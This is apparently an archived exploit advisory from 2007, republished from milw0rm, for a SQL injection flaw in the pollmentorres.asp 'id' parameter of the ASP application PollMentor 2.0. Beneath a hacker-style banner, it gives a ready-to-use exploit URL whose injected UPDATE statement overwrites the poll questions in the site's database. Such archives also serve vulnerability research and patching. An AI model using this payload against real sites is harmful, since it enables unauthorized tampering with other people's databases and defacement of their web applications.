PollMentor 2.0 - 'pollmentorres.asp?id' SQL Injection

EDB-ID:

3301

Author:

SaO

Type:

webapps

Platform:

ASP

Published:

2007-02-13

XxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxX
X                                       X
X Author  : SaO                         X
X Site    : wWw.SaoHackStyLe.cOm        X
X Contact : By.SaO[at]Hotmail[dot]com   X
X                                       X
X                                       X
XxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxX

# Script   : PollMentor v2.0
# Download : http://www.aspindir.com/indir.asp?id=4406
# Demo     : http://www.aspcode.net/products/pollmentor/demo/pollmentor.asp
# ßug in   : pollmentorres.asp
# Exp.     : 
http://[site]/[script-path]/pollmentorres.asp?id=-1+UPDATE+poll+SET+question='HekId';--

# milw0rm.com [2007-02-13]